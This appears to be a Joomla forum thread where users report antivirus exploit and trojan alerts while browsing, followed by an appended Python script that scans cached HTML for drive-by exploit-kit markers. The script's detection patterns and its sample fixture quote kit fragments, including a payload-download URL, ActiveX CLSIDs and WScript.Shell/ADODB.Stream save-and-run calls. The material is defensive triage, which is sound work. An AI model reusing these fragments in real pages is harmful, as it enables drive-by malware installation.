I'm currently tempted to fire up a VM and let it run to see what happens ;-)
I'm getting these 3 hits from AntiVir when it happens:
First: HEURISTIC/Exploit.HTML
Then: HEURISTIC/Malware
Last: HTML/ADODB.Exploit.Gen
I'll try to give it another shot later to find the pattern of when it comes up and when not. But it's quite certain that it only happens to me on the Joomla forum site and _nowhere_ else. And every mother and her son is using Google ads nowadays, so it makes me crinkle my nose to blame it on Google.
I'll be back with some more info soon, I hope.
S
- pe7er
- Joomla! Enthusiast
- Posts: 162
- Joined: Thu Aug 18, 2005 8:55 pm
- Location: Nijmegen, The Netherlands
- Contact:
Re: VBS/Psyme When Entering Joomla Forum
[MOD note: topics merged]
Kind Regards,
Peter Martin (aka pe7er)
db8.nl - Joomla! implementation, programming, template and component development [Dutch]
>> Questions? Get help more easily with JTS-post Assistant: viewtopic.php?f=428&t=272481
Re: VBS/Psyme When Entering Joomla Forum
Just got another trojan, definitely off this forum; had one last week as well. Was accessing the Joomla! 1.5 >> General Questions section using IE6.
AVG warning, then "Windows cannot access .//..//xXx.exe..."
Found xXx.exe (file size 3.88 KB) dropped into my user folder; AVG calls it "Trojan horse Agent.LES".
Couldn't find anything in the page source that looked unusual; it appears to be a random occurrence to stop it being traced easily.
Next time it happens I will keep all my cache source and try to work out where it's coming from.
Paul
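A triage script for saved page source, as an added example that is not code from the thread or from Joomla. It covers both the kit posted earlier and what Paul says he wants to do with his cached source: it looks for the markers that kit carries (clientCaps component fingerprinting, the ADODB.Stream / WScript.Shell download-and-execute chain, the RDS.DataSpace and HTML Help control CLSIDs, the sun.misc.Unsafe applet, 1-pixel applets or iframes) and lists every URL on the page so the payload hosts can be pulled out without reading the obfuscated script by hand. The CLSID-to-control names are Microsoft's registrations for those controls; the verdict thresholds and both sample inputs are assumptions of the example.

```python
"""Triage saved HTML for the drive-by kit markers seen in the thread (added example)."""
import re
import sys

# (name, pattern, meaning). The strings are literal fragments of the posted kit.
SIGNATURES = (
    ("clientcaps_fingerprint",
     re.compile(r"isComponentInstalled|getComponentVersion|#default#clientcaps", re.I),
     "IE clientCaps behaviour used to fingerprint installed components"),
    ("adodb_stream", re.compile(r"ADODB\.Stream", re.I), "ADODB.Stream: writes downloaded bytes to disk"),
    ("wscript_shell", re.compile(r"WScript\.Shell", re.I), "WScript.Shell: runs the dropped file"),
    ("savetofile", re.compile(r"\.SaveToFile\s*\(", re.I), "Stream.SaveToFile call"),
    ("shell_run", re.compile(r"\.Run\s*\(", re.I), "WshShell.Run call"),
    ("rds_dataspace_clsid", re.compile(r"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I),
     "RDS.DataSpace CLSID (Remote Data Services, the MS06-014 vector)"),
    ("hhctrl_clsid", re.compile(r"adb880a6-d8ff-11cf-9377-00aa003b7a11", re.I),
     "HTML Help ActiveX control CLSID used by the MS05-001 stage"),
    ("ms_its_url", re.compile(r"ms-its:", re.I), "ms-its: CHM URL"),
    ("hta_launch", re.compile(r"\bmshta\b|\.hta\b", re.I), "HTA launched via mshta"),
    ("java_unsafe", re.compile(r"sun\.misc\.Unsafe|\.defineClass\s*\(", re.I),
     "Java applet escaping the sandbox with sun.misc.Unsafe"),
    ("tiny_applet_or_iframe",
     re.compile(r"<(?:applet|iframe)\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I),
     "0- or 1-pixel applet/iframe"),
)

# All four together mean a download-and-execute chain, whichever ActiveX vector is used.
DROP_CHAIN = ("adodb_stream", "wscript_shell", "savetofile", "shell_run")

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def scan_html(text):
    """Return matched markers, every URL on the page, and a verdict (thresholds are assumptions)."""
    hits = {}
    for name, pattern, meaning in SIGNATURES:
        count = sum(1 for _ in pattern.finditer(text))
        if count:
            hits[name] = {"count": count, "meaning": meaning}
    chain = all(k in hits for k in DROP_CHAIN)
    if chain:
        verdict = "download-and-execute chain (MS06-014 style)"
    elif len(hits) >= 3:
        verdict = "exploit-kit markers present"
    elif hits:
        verdict = "suspicious, review manually"
    else:
        verdict = "no known markers"
    return {"hits": hits, "urls": sorted(set(URL_RE.findall(text))),
            "download_exec_chain": chain, "verdict": verdict}


def scan_file(path):
    """Scan one saved page; browser cache files are often not clean UTF-8, so replace errors."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_html(fh.read())


# Constructed sample (assumption): fragments of the posted kit, not the whole file.
SAMPLE_KIT = """<HTML xmlns:IE><HEAD><STYLE>IE\\:clientCaps {behavior:url(#default#clientcaps)}</STYLE></HEAD>
<IE:clientCaps ID="oClientCaps" />
<script>
a.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var s = a.CreateObject("WScript.Shell"); var o = a.CreateObject("ADODB.Stream");
var url = 'http://void.theoreon.com/exe.php?ex=5068';
o.SaveToFile(bin, 2); s.Run(bin, 0);
document.write('<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>');
</script><body onload='ExploitAll()'></body></HTML>"""

# Constructed sample (assumption): an ordinary forum page with a normal ad include.
SAMPLE_CLEAN = """<html><head><title>Joomla! Forum</title></head><body>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<div class="post">Re: VBS/Psyme When Entering Joomla Forum</div></body></html>"""

if __name__ == "__main__":
    # With file arguments, scan those cache files; otherwise show both constructed samples.
    if sys.argv[1:]:
        results = [(p, scan_file(p)) for p in sys.argv[1:]]
    else:
        results = [("sample_kit", scan_html(SAMPLE_KIT)), ("sample_clean", scan_html(SAMPLE_CLEAN))]
    for label, r in results:
        print(f"{label}: {r['verdict']}")
        for name, h in r["hits"].items():
            print(f"  {name} x{h['count']}: {h['meaning']}")
        for u in r["urls"]:
            print(f"  url: {u}")
```

Point it at every HTML and JS file saved from the browser cache for the visit (`python triage_cache.py cache/*.htm cache/*.js`); a hit on an ad-network include file rather than the forum's own markup is what would settle the "is it the Google ads or the forum?" question raised in the thread.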